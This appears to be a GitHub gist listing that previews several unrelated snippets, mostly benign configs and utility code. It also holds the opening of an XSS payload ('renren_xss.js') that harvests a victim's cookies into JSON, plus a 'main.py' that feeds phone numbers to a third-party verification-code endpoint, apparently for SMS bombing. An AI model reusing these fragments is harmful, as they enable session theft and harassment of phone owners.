View main.py
#-*-coding:utf-8-*- | |
import re | |
import time | |
import json | |
import requests | |
from random import choice | |
code_url = 'http://ama.adwo.com/advmessage/adv/addResultJsonP.action?advid=30345&mobile={phone}&callback=callback' |
View cmds.txt
//wearversion | |
//wearlog | |
//wearvoiceinputenable | |
//wearvoiceinputdisable | |
//weargoogleapi | |
//assert | |
//pushassert | |
//uplog | |
//upcrash | |
//switchnotificationstatus |
View downlist.py
#-*-coding:utf-8-*- | |
import os | |
import re | |
import sys | |
import requests | |
from gevent import monkey | |
monkey.patch_all() | |
from gevent.pool import Pool |
View gunicorn_supervisor.conf
; Minimal sample supervisor config file. | |
; | |
; For more information on the config file, please see: | |
; http://supervisord.org/configuration.html | |
[inet_http_server] | |
port=127.0.0.1:9001 | |
username=user | |
password=password |
View Rational.scala
class Rational(n: Int, d: Int) { | |
require(d != 0) | |
private val g = gcd(n.abs, d.abs) | |
val numer: Int = n / g | |
val denom: Int = d / g | |
def this(n: Int) = this(n, 1) |
View core.py
# -*- coding: utf-8 -*- | |
""" | |
core module, defines some extension instances etc. | |
""" | |
from flask_sqlalchemy import SQLAlchemy | |
#: Flask-SQLAlchemy extension instance | |
db = SQLAlchemy() |
View cloudpickle.py
""" | |
This class is defined to override standard pickle functionality | |
The goals of it follow: | |
-Serialize lambdas and nested functions to compiled byte code | |
-Deal with main module correctly | |
-Deal with other non-serializable objects | |
It does not include an unpickler, as standard python unpickling suffices. |
View 抓毛毛
!function() { | |
var getLottery = function() { | |
var url = 'http://promotion.taobao.com/tmall/luckyCat.do?'; | |
url += 'c24291a8ab24d18cd51be92e4b2eecce'; | |
url += '&ruleId=1111'; | |
url += '&RandomNum=' + new Date().getTime(); | |
url += '&ua=' + encodeURIComponent(ua); | |
url += '&d=m'; | |
KISSY.io({ |
View jsonify.py
import json | |
# jsonify response decorator | |
def jsonify(f): | |
def wrapped(*args, **kwargs): | |
return Response(json.dumps(f(*args, **kwargs)), mimetype='application/json') | |
return wrapped |
View renren_xss.js
if (window.isUndefined(window.injector)) { | |
window.injector = 'defined'; | |
d = document.cookie; | |
cookie = {}; | |
reg = /([\w_]+)=([\w.]+)/g; | |
tmp = null; | |
while ((tmp = reg.exec(d)) != null) { | |
cookie[tmp[1]] = tmp[2]; | |
} | |
cookieStr = JSON.stringify(cookie); |